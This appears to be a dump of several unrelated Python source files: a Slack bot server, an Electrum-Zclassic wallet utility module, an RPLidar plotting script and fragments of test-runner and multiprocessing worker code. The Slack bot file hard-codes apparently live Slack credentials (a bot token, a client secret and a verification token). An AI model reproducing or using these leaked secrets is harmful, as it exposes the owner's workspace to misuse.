        """Thread body: spawn the executable, wait for it, log its output
        and store the return code in ``self.result``."""
        executable = self.args[0]
        if not os.path.exists(executable) or not os.access(
                executable, os.F_OK | os.X_OK):
            # Exit code that means some system file did not exist,
            # could not be opened, or had some other kind of error.
            self.result = os.EX_OSFILE
            raise EnvironmentError(
                "executable '%s' is not found or executable." % executable)
        self.logger.debug("Running executable: '{app}'"
                          .format(app=' '.join(self.args)))
        env = os.environ.copy()
        env.update(self.env)
        env["CK_LOG_FILE_NAME"] = "-"
        # own process group so signals aimed at the test don't hit the child
        self.process = subprocess.Popen(
            self.args, shell=False, env=env, preexec_fn=os.setpgrp,
            stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        self.wait_for_enter()
        out, err = self.process.communicate()
        self.logger.debug("Finished running `{app}'".format(app=self.app_name))
        self.logger.info("Return code is `%s'" % self.process.returncode)
        self.logger.info(single_line_delim)
        self.logger.info("Executable `{app}' wrote to stdout:"
                         .format(app=self.app_name))
        self.logger.info(single_line_delim)
        self.logger.info(out.decode('utf-8'))
        self.logger.info(single_line_delim)
        self.logger.info("Executable `{app}' wrote to stderr:"
                         .format(app=self.app_name))
        self.logger.info(single_line_delim)
        self.logger.info(err.decode('utf-8'))
        self.logger.info(single_line_delim)
        self.result = self.process.returncode
if __name__ == '__main__':
    # this module is a library used by test runners; nothing to do when
    # executed directly
    pass
|
pypypy.py | # -- coding: utf-8 --
import json
import os
import re
import urllib.request
import time
# 쓰레드, 큐를 위한 라이브러리 추가
import multiprocessing as mp
from threading import Thread
from bs4 import BeautifulSoup
from slackclient import SlackClient
from flask import Flask, request, make_response, render_template
app = Flask(__name__)

# slack_token = "xoxb-"
# slack_client_id = ""
# slack_client_secret = ""
# slack_verification = ""

# SECURITY WARNING: real Slack credentials are hard-coded below and have
# been committed to source control; they must be considered compromised.
# Revoke/rotate them and load secrets from environment variables or a
# secrets manager instead of the source file.
slack_token = "xoxb-504131970294-507333492948-gfbVEOhHXoalXevCPgoTwwoO"
slack_client_id = "504131970294.507700765157"
slack_client_secret = "d8c500345b1131cec662d5857f531a3a"
slack_verification = "cmGhxZO9wtWqkPADc1KQH56x"

sc = SlackClient(slack_token)
# threading function
def processing_event(queue):
    """Consume Slack events from *queue* forever and answer each one.

    Runs on a background thread.  Uses a blocking ``queue.get()`` instead
    of polling ``queue.empty()`` in a tight ``while True`` loop, which
    previously spun a full CPU core while idle (and was racy with more
    than one consumer).
    """
    while True:
        # blocks until an event is available
        slack_event = queue.get()
        channel = slack_event["event"]["channel"]
        text = slack_event["event"]["text"]
        # run the (potentially slow) chatbot crawling logic
        keywords = processing_function(text)
        # post the result back to the originating channel
        sc.api_call(
            "chat.postMessage",
            channel=channel,
            text=keywords
        )
# crawling function
def processing_function(text):
    """Return the chatbot's reply for the given message *text*.

    TODO: implement the real crawling logic; currently returns a fixed
    success string.
    """
    # The temporary ``time.sleep(5)`` test delay has been removed, as
    # instructed by the original TODO comment - it only simulated a slow
    # job and stalled every reply by five seconds.
    keywords = "성공!!~"
    return keywords
# event-dispatch helper
def _event_handler(event_type, slack_event):
    """Route a verified Slack event: enqueue ``app_mention`` events for
    the background worker and acknowledge immediately so Slack does not
    retry the delivery."""
    if event_type == "app_mention":
        event_queue.put(slack_event)
        return make_response("App mention message has been sent", 200, )
    # BUG FIX: previously fell through and returned None, which makes
    # Flask raise a 500 for any other subscribed event type; acknowledge
    # instead so Slack stops retrying.
    return make_response("[NO HANDLER] event type %s" % event_type, 200,
                         {"X-Slack-No-Retry": 1})
@app.route("/listening", methods=["GET", "POST"])
def hears():
    """Slack Events API endpoint: answers the URL-verification
    handshake, rejects requests with a bad verification token, and
    dispatches subscribed events to ``_event_handler``."""
    slack_event = json.loads(request.data)
    # URL-verification handshake: echo the challenge back
    if "challenge" in slack_event:
        return make_response(slack_event["challenge"], 200,
                             {"content_type": "application/json"})
    if slack_verification != slack_event.get("token"):
        message = "Invalid Slack verification token: %s" \
            % (slack_event.get("token"))
        # BUG FIX: the 403 response was built but never returned, so
        # requests carrying a bad token fell through and were processed
        # anyway.
        return make_response(message, 403, {"X-Slack-No-Retry": 1})
    if "event" in slack_event:
        event_type = slack_event["event"]["type"]
        return _event_handler(event_type, slack_event)
    # If our bot hears things that are not events we've subscribed to,
    # send a quirky but helpful error response
    return make_response("[NO EVENT IN SLACK REQUEST] These are not the droids\
you're looking for.", 404, {"X-Slack-No-Retry": 1})
@app.route("/", methods=["GET"])
def index():
    """Health-check page confirming the server is up."""
    banner = "<h1>Server is ready.</h1>"
    return banner
if __name__ == '__main__':
    # queue shared between the Flask request handlers and the worker thread
    event_queue = mp.Queue()
    # background consumer (a Thread, despite the multiprocessing queue -
    # works, though a plain queue.Queue would suffice for threads)
    p = Thread(target=processing_event, args=(event_queue,))
    p.start()
    print("subprocess started")
    app.run('0.0.0.0', port=8080)
    # NOTE(review): the worker loops forever, so this join() blocks
    # indefinitely once app.run() returns - confirm the intended shutdown
    p.join()
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
# display denominations: unit name -> number of fractional decimal places
base_units = {'zcl':8, 'mzcl':5, 'uzcl':2}
# fee slider labels, slowest to fastest confirmation target
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
    """Split a dotted version string into a list of ints, dropping any
    trailing run of ``.0`` components (so '1.2.0' compares equal to '1.2')."""
    trimmed = re.sub(r'(\.0+)*$', '', v)
    return [int(part) for part in trimmed.split(".")]
# raised when the wallet cannot fund a requested amount (name-based;
# confirm semantics at call sites)
class NotEnoughFunds(Exception): pass


class InvalidPassword(Exception):
    def __str__(self):
        # localized message shown to the user on decryption failure
        return _("Incorrect password")


# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
    '''An exception that is suppressed from the user'''
    pass
class MyEncoder(json.JSONEncoder):
    """JSON encoder that also knows how to serialize Transaction objects."""
    def default(self, obj):
        # local import - presumably to avoid a circular dependency at
        # module load time (confirm)
        from transaction import Transaction
        if isinstance(obj, Transaction):
            return obj.as_dict()
        return super(MyEncoder, self).default(obj)
class PrintError(object):
    '''A handy base class'''
    # Mixin providing logging helpers that prefix messages with a
    # per-class diagnostic name.

    def diagnostic_name(self):
        # default prefix is the concrete class name; subclasses may override
        return self.__class__.__name__

    def print_error(self, *msg):
        # module-level print_error: only emitted in verbose mode
        print_error("[%s]" % self.diagnostic_name(), *msg)

    def print_msg(self, *msg):
        print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
    """A job that is run periodically from a thread's main loop. run() is
    called from that thread's context.
    """

    def run(self):
        """Called periodically from the thread"""
        # base implementation does nothing; subclasses override
        pass
class DebugMem(ThreadJob):
    '''A handy class for debugging GC memory leaks'''

    def __init__(self, classes, interval=30):
        # next_time=0 forces a scan on the first run() call
        self.next_time = 0
        self.classes = classes
        self.interval = interval

    def mem_stats(self):
        """Count live GC-tracked instances of each watched class and log
        the totals."""
        import gc
        self.print_error("Start memscan")
        gc.collect()
        objmap = defaultdict(list)
        for obj in gc.get_objects():
            for class_ in self.classes:
                if isinstance(obj, class_):
                    objmap[class_].append(obj)
        for class_, objs in objmap.items():
            self.print_error("%s: %d" % (class_.__name__, len(objs)))
        self.print_error("Finish memscan")

    def run(self):
        # rate-limit scans to at most one per `interval` seconds
        if time.time() > self.next_time:
            self.mem_stats()
            self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
    """ daemon thread that terminates cleanly """

    def __init__(self):
        threading.Thread.__init__(self)
        # remember the creating thread: is_running() also reports False
        # once the parent dies, so the daemon can shut itself down
        self.parent_thread = threading.currentThread()
        self.running = False
        self.running_lock = threading.Lock()
        self.job_lock = threading.Lock()
        self.jobs = []

    def add_jobs(self, jobs):
        with self.job_lock:
            self.jobs.extend(jobs)

    def run_jobs(self):
        # Don't let a throwing job disrupt the thread, future runs of
        # itself, or other jobs. This is useful protection against
        # malformed or malicious server responses
        with self.job_lock:
            for job in self.jobs:
                try:
                    job.run()
                except:
                    traceback.print_exc(file=sys.stderr)

    def remove_jobs(self, jobs):
        with self.job_lock:
            for job in jobs:
                self.jobs.remove(job)

    def start(self):
        # mark running before the thread actually starts so is_running()
        # is already True for the new thread's first loop iteration
        with self.running_lock:
            self.running = True
        return threading.Thread.start(self)

    def is_running(self):
        with self.running_lock:
            return self.running and self.parent_thread.is_alive()

    def stop(self):
        with self.running_lock:
            self.running = False

    def on_stop(self):
        # on Android, detach this thread from the JVM before exiting to
        # avoid a crash in the JNI layer
        if 'ANDROID_DATA' in os.environ:
            import jnius
            jnius.detach()
            self.print_error("jnius detach")
        self.print_error("stopped")
# global verbosity flag, toggled via set_verbosity()
is_verbose = False


def set_verbosity(b):
    '''Enable or disable debug output from print_error().'''
    global is_verbose
    is_verbose = b


def print_error(*args):
    # debug output: silently dropped unless verbose mode is on
    if not is_verbose: return
    print_stderr(*args)


def print_stderr(*args):
    '''Write all args, space-separated, as one line to stderr.'''
    args = [str(item) for item in args]
    sys.stderr.write(" ".join(args) + "\n")
    sys.stderr.flush()


def print_msg(*args):
    '''Write all args, space-separated, as one line to stdout.'''
    # Stringify args
    args = [str(item) for item in args]
    sys.stdout.write(" ".join(args) + "\n")
    sys.stdout.flush()
def json_encode(obj):
    '''Serialize *obj* to pretty-printed JSON via MyEncoder; falls back
    to repr() for objects the encoder cannot handle.'''
    try:
        s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
    except TypeError:
        s = repr(obj)
    return s
def json_decode(x):
    '''Parse JSON, mapping floats to Decimal for monetary precision;
    return *x* unchanged when it is not valid JSON (or not a string).'''
    try:
        return json.loads(x, parse_float=Decimal)
    except (ValueError, TypeError):
        # BUG FIX: was a bare ``except:``, which also swallowed
        # KeyboardInterrupt/SystemExit; only parse/type errors from
        # json.loads are expected here.
        return x
# decorator that prints execution time
def profiler(func):
    '''Decorator: log the wall-clock run time of each call of *func*
    through print_error (only visible in verbose mode).'''
    def do_profile(func, args, kw_args):
        # BUG FIX: use __name__, which exists on functions in both
        # Python 2 and 3; ``func_name`` is Python-2-only.
        n = func.__name__
        t0 = time.time()
        o = func(*args, **kw_args)
        t = time.time() - t0
        print_error("[profiler]", n, "%.4f"%t)
        return o
    return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
    '''Path of the Android external storage directory (via pyjnius).'''
    import jnius
    env = jnius.autoclass('android.os.Environment')
    return env.getExternalStorageDirectory().getPath()


def android_data_dir():
    '''App-private data directory inside the Android sandbox.'''
    import jnius
    PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
    return PythonActivity.mActivity.getFilesDir().getPath() + '/data'


def android_headers_dir():
    '''Directory on external storage holding the blockchain headers
    file; created on first use.'''
    d = android_ext_dir() + '/org.electrum_zcl.electrum_zcl'
    if not os.path.exists(d):
        # NOTE(review): os.mkdir fails if the parent is missing - confirm
        # the external storage root always exists at this point
        os.mkdir(d)
    return d
def android_check_data_dir():
    """ if needed, move old directory to sandbox """
    ext_dir = android_ext_dir()
    data_dir = android_data_dir()
    old_electrum_dir = ext_dir + '/electrum-zcl'
    # one-time migration from the pre-sandbox layout
    if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
        import shutil
        new_headers_path = android_headers_dir() + '/blockchain_headers'
        old_headers_path = old_electrum_dir + '/blockchain_headers'
        # headers stay on external storage; everything else moves into
        # the app sandbox
        if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
            print_error("Moving headers file to", new_headers_path)
            shutil.move(old_headers_path, new_headers_path)
        print_error("Moving data to", data_dir)
        shutil.move(old_electrum_dir, data_dir)
    return data_dir
def get_headers_dir(config):
    # headers live on external storage on Android, next to the config
    # directory otherwise
    return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path


def user_dir():
    '''Per-user application data directory for the current platform, or
    None when it cannot be determined.'''
    if 'ANDROID_DATA' in os.environ:
        return android_check_data_dir()
    elif os.name == 'posix':
        return os.path.join(os.environ["HOME"], ".electrum-zcl")
    elif "APPDATA" in os.environ:
        return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
    elif "LOCALAPPDATA" in os.environ:
        return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
    else:
        #raise Exception("No home directory found in environment variables.")
        return
def format_satoshis_plain(x, decimal_point = 8):
    '''Display a satoshi amount scaled. Always uses a '.' as a decimal
    point and has no thousands separator.

    :param x: amount in base units
    :param decimal_point: scaling exponent (8 -> whole coins)
    '''
    scale_factor = pow(10, decimal_point)
    # BUG FIX: honour decimal_point in the format precision; the
    # hard-coded "{:.8f}" silently truncated digits whenever
    # decimal_point > 8.
    return "{:.{prec}f}".format(
        Decimal(x) / scale_factor, prec=decimal_point
    ).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
    """Format a satoshi amount for display using the locale's decimal
    separator and thousands grouping.

    :param x: amount in base units (int/Decimal) or None
    :param is_diff: prefix positive amounts with '+'
    :param num_zeros: minimum number of fractional digits shown
    :param decimal_point: scaling exponent (8 -> whole coins)
    :param whitespaces: pad to a fixed width of 15 characters
    """
    from locale import localeconv
    if x is None:
        return 'unknown'
    x = int(x)  # Some callers pass Decimal
    scale_factor = pow (10, decimal_point)
    # "{:n}" applies locale-aware thousands grouping
    integer_part = "{:n}".format(int(abs(x) / scale_factor))
    if x < 0:
        integer_part = '-' + integer_part
    elif is_diff:
        integer_part = '+' + integer_part
    dp = localeconv()['decimal_point']
    # zero-pad the fractional digits to the full width, then trim
    fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
    fract_part = fract_part.rstrip('0')
    if len(fract_part) < num_zeros:
        fract_part += "0" * (num_zeros - len(fract_part))
    result = integer_part + dp + fract_part
    if whitespaces:
        result += " " * (decimal_point - len(fract_part))
        result = " " * (15 - len(result)) + result
    # NOTE(review): str.decode exists only on Python 2 byte strings -
    # this module targets Python 2; this line would fail on Python 3
    return result.decode('utf8')
def timestamp_to_datetime(timestamp):
    '''Convert a POSIX timestamp to a local datetime, or None when the
    value is missing or out of range.'''
    try:
        return datetime.fromtimestamp(timestamp)
    except (TypeError, ValueError, OverflowError, OSError):
        # BUG FIX: was a bare ``except:`` - catch only the conversion
        # errors fromtimestamp can raise, so KeyboardInterrupt and
        # programming errors are no longer swallowed.
        return None
def format_time(timestamp):
    '''Human-readable date/time string for a POSIX timestamp; localized
    "Unknown" when the timestamp cannot be converted.'''
    date = timestamp_to_datetime(timestamp)
    # [:-3] drops the trailing ":SS" seconds from the ISO string
    return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
    """Return a human-readable age ("... ago" / "in ...") for a POSIX
    timestamp, relative to *since_date* (default: now in *target_tz*)."""
    if from_date is None:
        return "Unknown"
    from_date = datetime.fromtimestamp(from_date)
    if since_date is None:
        since_date = datetime.now(target_tz)
    td = time_difference(from_date - since_date, include_seconds)
    # past dates read "X ago", future dates read "in X"
    return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
    """Approximate a timedelta as a human-readable phrase ("half a
    minute", "about 1 hour", "3 days", ...).

    :param distance_in_time: a datetime.timedelta (sign is ignored)
    :param include_seconds: give finer-grained wording under one minute
    """
    #distance_in_time = since_date - from_date
    distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
    # NOTE(review): on Python 2 this is integer (floor) division; under
    # Python 3 true division plus round() can yield a different minute
    # count (e.g. 90s). This module targets Python 2 - confirm before
    # porting.
    distance_in_minutes = int(round(distance_in_seconds/60))
    if distance_in_minutes <= 1:
        if include_seconds:
            for remainder in [5, 10, 20]:
                if distance_in_seconds < remainder:
                    return "less than %s seconds" % remainder
            if distance_in_seconds < 40:
                return "half a minute"
            elif distance_in_seconds < 60:
                return "less than a minute"
            else:
                return "1 minute"
        else:
            if distance_in_minutes == 0:
                return "less than a minute"
            else:
                return "1 minute"
    elif distance_in_minutes < 45:
        return "%s minutes" % distance_in_minutes
    elif distance_in_minutes < 90:
        return "about 1 hour"
    elif distance_in_minutes < 1440:
        return "about %d hours" % (round(distance_in_minutes / 60.0))
    elif distance_in_minutes < 2880:
        return "1 day"
    # NOTE(review): 43220 looks like a typo for 43200 (30 days in
    # minutes) - confirm the intended threshold
    elif distance_in_minutes < 43220:
        return "%d days" % (round(distance_in_minutes / 1440))
    elif distance_in_minutes < 86400:
        return "about 1 month"
    elif distance_in_minutes < 525600:
        return "%d months" % (round(distance_in_minutes / 43200))
    elif distance_in_minutes < 1051200:
        return "about 1 year"
    else:
        return "over %d years" % (round(distance_in_minutes / 525600))
# explorer name -> (base URL, {lookup kind -> URL path segment})
mainnet_block_explorers = {
    'ZclassicExplorer.com': ('http://zclassicexplorer.com/',
                             {'tx': 'tx', 'addr': 'address'}),
}

testnet_block_explorers = {
    'ZclassicExplorer.com': ('http://zclassicexplorer.com/',
                             {'tx': 'tx', 'addr': 'address'}),
}


def block_explorer_info():
    # choose the table matching the active network
    import bitcoin
    return testnet_block_explorers if bitcoin.TESTNET else mainnet_block_explorers


def block_explorer(config):
    # user-selected explorer name, with a default
    return config.get('block_explorer', 'ZclassicExplorer.com')


def block_explorer_tuple(config):
    # (base URL, kind map) for the configured explorer, or None
    return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
    """Build the explorer URL for *item* (a tx hash or an address), or
    None when no explorer or kind mapping is configured."""
    explorer = block_explorer_tuple(config)
    if not explorer:
        return
    base_url, kind_map = explorer
    kind_str = kind_map.get(kind)
    if not kind_str:
        return
    return "/".join([base_url, kind_str, item])
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)


def parse_URI(uri, on_pr=None):
    """Parse a ``vertcoin:`` payment URI into a dict with keys such as
    'address', 'amount' (satoshis), 'message'/'memo', 'time', 'exp',
    'sig', 'r'.

    :param uri: a bare address or a BIP21-style URI
    :param on_pr: optional callback, invoked from a daemon thread with
        the fetched/deserialized payment request when the URI carries one
    :raises BaseException: for malformed addresses or a wrong scheme
    """
    import bitcoin
    from bitcoin import COIN
    # a bare address (no scheme) is accepted as a shortcut
    if ':' not in uri:
        if not bitcoin.is_address(uri):
            raise BaseException("Not a vertcoin address")
        return {'address': uri}
    u = urlparse.urlparse(uri)
    if u.scheme != 'vertcoin':
        raise BaseException("Not a vertcoin URI")
    address = u.path
    # python for android fails to parse query
    if address.find('?') > 0:
        address, query = u.path.split('?')
        pq = urlparse.parse_qs(query)
    else:
        pq = urlparse.parse_qs(u.query)
    # each query key must appear exactly once
    for k, v in pq.items():
        if len(v)!=1:
            raise Exception('Duplicate Key', k)
    out = {k: v[0] for k, v in pq.items()}
    if address:
        if not bitcoin.is_address(address):
            raise BaseException("Invalid vertcoin address:" + address)
        out['address'] = address
    if 'amount' in out:
        am = out['amount']
        # amounts may be written "<mantissa>X<exponent>"; otherwise they
        # are whole coins, scaled by COIN into satoshis
        m = re.match('([0-9\.]+)X([0-9])', am)
        if m:
            k = int(m.group(2)) - 8
            amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
        else:
            amount = Decimal(am) * COIN
        out['amount'] = int(amount)
    if 'message' in out:
        # Python 2: byte string -> unicode
        out['message'] = out['message'].decode('utf8')
        out['memo'] = out['message']
    if 'time' in out:
        out['time'] = int(out['time'])
    if 'exp' in out:
        out['exp'] = int(out['exp'])
    if 'sig' in out:
        out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
    r = out.get('r')
    sig = out.get('sig')
    name = out.get('name')
    # a payment request may be referenced by URL ('r') or embedded
    # ('name' + 'sig'); fetch/deserialize it off the calling thread and
    # hand it to on_pr
    if on_pr and (r or (name and sig)):
        def get_payment_request_thread():
            import paymentrequest as pr
            if name and sig:
                s = pr.serialize_request(out).SerializeToString()
                request = pr.PaymentRequest(s)
            else:
                request = pr.get_payment_request(r)
            on_pr(request)
        t = threading.Thread(target=get_payment_request_thread)
        t.setDaemon(True)
        t.start()
    return out
def create_URI(addr, amount, message):
    """Build a ``vertcoin:`` BIP21-style URI for the given address with
    optional amount (satoshis) and message; returns '' for an invalid
    address."""
    import bitcoin
    if not bitcoin.is_address(addr):
        return ""
    query = []
    if amount:
        query.append('amount=%s'%format_satoshis_plain(amount))
    if message:
        # Python 2: encode unicode before percent-quoting
        if type(message) == unicode:
            message = message.encode('utf8')
        query.append('message=%s'%urllib.quote(message))
    p = urlparse.ParseResult(scheme='vertcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
    return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
    # write the prompt to stdout ourselves, then delegate to the builtin
    if prompt:
        sys.stdout.write(prompt)
    return builtin_raw_input()


import __builtin__
builtin_raw_input = __builtin__.raw_input
# globally replace the builtin with the fixed wrapper (Python 2 only)
__builtin__.raw_input = raw_input
def parse_json(message):
    """Split one newline-terminated JSON document off the front of
    *message*; return (parsed-or-None, remainder)."""
    newline_at = message.find('\n')
    if newline_at == -1:
        # no complete document buffered yet
        return None, message
    head = message[0:newline_at]
    rest = message[newline_at + 1:]
    try:
        parsed = json.loads(head)
    except:
        parsed = None
    return parsed, rest
class timeout(Exception):
    # raised by SocketPipe/QueuePipe when a read does not complete in time
    pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
    """Newline-delimited JSON message pipe over a (possibly SSL) socket.

    get() returns one decoded message at a time (raising ``timeout``
    when none arrives in time); send()/send_all() write JSON documents
    terminated by a newline.
    """

    def __init__(self, socket):
        self.socket = socket
        # receive buffer of not-yet-parsed data
        self.message = ''
        self.set_timeout(0.1)
        self.recv_time = time.time()

    def set_timeout(self, t):
        self.socket.settimeout(t)

    def idle_time(self):
        # seconds since data was last received
        return time.time() - self.recv_time

    def get(self):
        """Return the next decoded message, None when the connection was
        closed remotely, or raise ``timeout``."""
        while True:
            response, self.message = parse_json(self.message)
            if response is not None:
                return response
            try:
                data = self.socket.recv(1024)
            except socket.timeout:
                raise timeout
            except ssl.SSLError:
                raise timeout
            except socket.error as err:
                # NOTE(review): 60 is ETIMEDOUT on BSD/macOS only;
                # 11/35/10035 are EAGAIN (Linux) / EWOULDBLOCK (macOS) /
                # WSAEWOULDBLOCK (Windows) - confirm portability intent
                if err.errno == 60:
                    raise timeout
                elif err.errno in [11, 35, 10035]:
                    print_error("socket errno %d (resource temporarily unavailable)" % err.errno)
                    time.sleep(0.2)
                    raise timeout
                else:
                    print_error("pipe: socket error", err)
                    data = ''
            except:
                traceback.print_exc(file=sys.stderr)
                data = ''
            if not data:  # Connection closed remotely
                return None
            self.message += data
            self.recv_time = time.time()

    def send(self, request):
        out = json.dumps(request) + '\n'
        self._send(out)

    def send_all(self, requests):
        # batch several requests into one socket write
        out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
        self._send(out)

    def _send(self, out):
        # keep writing until the whole buffer is flushed, retrying on
        # transient SSL / would-block / timeout conditions
        while out:
            try:
                sent = self.socket.send(out)
                out = out[sent:]
            except ssl.SSLError as e:
                print_error("SSLError:", e)
                time.sleep(0.1)
                continue
            except socket.error as e:
                # Python 2: socket.error args are indexable
                if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
                    print_error("EAGAIN: retrying")
                    time.sleep(0.1)
                    continue
                elif e[0] in ['timed out', 'The write operation timed out']:
                    print_error("socket timeout, retry")
                    time.sleep(0.1)
                    continue
                else:
                    traceback.print_exc(file=sys.stdout)
                    raise e
import Queue
class QueuePipe:
    """In-process stand-in for SocketPipe, backed by a pair of queues
    (Python 2 ``Queue`` module)."""

    def __init__(self, send_queue=None, get_queue=None):
        self.send_queue = send_queue if send_queue else Queue.Queue()
        self.get_queue = get_queue if get_queue else Queue.Queue()
        self.set_timeout(0.1)

    def get(self):
        try:
            return self.get_queue.get(timeout=self.timeout)
        except Queue.Empty:
            # mirror SocketPipe's timeout behaviour
            raise timeout

    def get_all(self):
        # drain everything currently queued, without blocking
        responses = []
        while True:
            try:
                r = self.get_queue.get_nowait()
                responses.append(r)
            except Queue.Empty:
                break
        return responses

    def set_timeout(self, t):
        self.timeout = t

    def send(self, request):
        self.send_queue.put(request)

    def send_all(self, requests):
        for request in requests:
            self.send(request)
def check_www_dir(rdir):
    """Ensure the local web root *rdir* exists and contains index.html
    plus the jquery/qrcode assets, downloading any that are missing."""
    import urllib, urlparse, shutil, os
    if not os.path.exists(rdir):
        os.mkdir(rdir)
    index = os.path.join(rdir, 'index.html')
    if not os.path.exists(index):
        print_error("copying index.html")
        src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
        shutil.copy(src, index)
    files = [
        "https://code.jquery.com/jquery-1.9.1.min.js",
        "https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
        "https://code.jquery.com/ui/1.10.3/jquery-ui.js",
        "https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
    ]
    for URL in files:
        path = urlparse.urlsplit(URL).path
        filename = os.path.basename(path)
        path = os.path.join(rdir, filename)
        if not os.path.exists(path):
            print_error("downloading ", URL)
            # NOTE(review): downloads are not integrity-checked (no hash
            # pinning); served pages depend on these remote files
            urllib.urlretrieve(URL, path)
|
rplidar_plot.py | from rplidar import RPLidar
import matplotlib.pyplot as plt
import math
import time
import numpy as np
import threading
def draw():
    """Re-plot the latest (x, y) point cloud until ``is_plot`` is
    cleared; runs on a background thread."""
    global is_plot
    while is_plot:
        plt.figure(1)
        plt.cla()
        plt.ylim(-9000,9000)
        plt.xlim(-9000,9000)
        # NOTE(review): the scan loop swaps the module-level x/y arrays
        # without locking; a redraw may catch mismatched arrays
        plt.scatter(x,y,c='r',s=8)
        plt.pause(0.001)
    plt.close("all")
# state shared between the scan loop and the drawing thread
is_plot = True
x=[]
y=[]

lidar = RPLidar('/dev/ttyUSB0')
info = lidar.get_info()
print(info)
health = lidar.get_health()
print(health)
# give the motor time to spin up before scanning
time.sleep(2)

threading.Thread(target=draw).start()

# convert each scan's (quality, angle_deg, distance_mm) tuples to
# cartesian coordinates for plotting
for i, scan in enumerate(lidar.iter_scans()):
    print('%d: Got %d measurments' % (i, len(scan)))
    x = np.zeros(len(scan))
    y = np.zeros(len(scan))
    for j in range(len(scan)):
        x[j] = scan[j][2] * math.cos(math.radians(scan[j][1]))
        y[j] = scan[j][2] * math.sin(math.radians(scan[j][1]))

# NOTE(review): is_plot is never set False, so the draw thread keeps the
# process alive; this cleanup runs only if iter_scans() stops - confirm
# the intended shutdown path
lidar.stop()
lidar.stop_motor()
lidar.disconnect()
Worker.py | '''Values evaluated on separate processes via the multiprocessing module'''
from geode import Prop,PropManager,listen,base64_encode,is_windows
import multiprocessing.connection
import multiprocessing
import subprocess
import traceback
import select
import errno
import sys
import os
__all__ = ['Worker','worker_standalone_main']
# protocol message tags exchanged between master and worker
QUIT = 'quit'
QUIT_ACK = 'quit ack'
NEW_VALUE = 'new value'
SET_VALUE = 'set value'
CREATE_VALUE = 'create value'
PULL_VALUE = 'pull value'
RUN_JOB = 'run job'
class ValueProxies(PropManager):
    """Read-only mirror of the remote side's published values, updated by
    NEW_VALUE / SET_VALUE protocol messages."""

    def __init__(self,conn):
        self.conn = conn
        # frozen blocks local additions; only process() may temporarily
        # unfreeze while installing a remotely-created value
        self.frozen = True

    def process(self,tag,data):
        '''Process a message if possible, and return whether we understood it.'''
        if tag==NEW_VALUE:
            name,default = data
            if self.contains(name):
                raise RuntimeError("input '%s' already exists on worker process"%name)
            self.frozen = False
            try:
                self.add(name,default)
            finally:
                self.frozen = True
        elif tag==SET_VALUE:
            name,value = data
            self.get(name).set(value)
        else:
            return False
        return True
class Connection(object):
    """One endpoint of the master/worker message protocol: mirrors inputs
    into a ValueProxies, publishes outputs to the other side, and
    services CREATE_VALUE / PULL_VALUE / RUN_JOB / QUIT requests."""

    def __init__(self,side,conn,debug=False):
        # side: label used in debug prints ('worker' or 'master')
        self.side = side
        self.conn = conn
        self.debug = debug
        self.inputs = ValueProxies(conn)
        self.outputs = {}
        # keep listen() handles alive so change notifications keep firing
        self.listeners = []
        self.atquits = []

    def add_output(self,name,value):
        """Publish *value* under *name* and push an update on every
        subsequent change."""
        assert name not in self.outputs
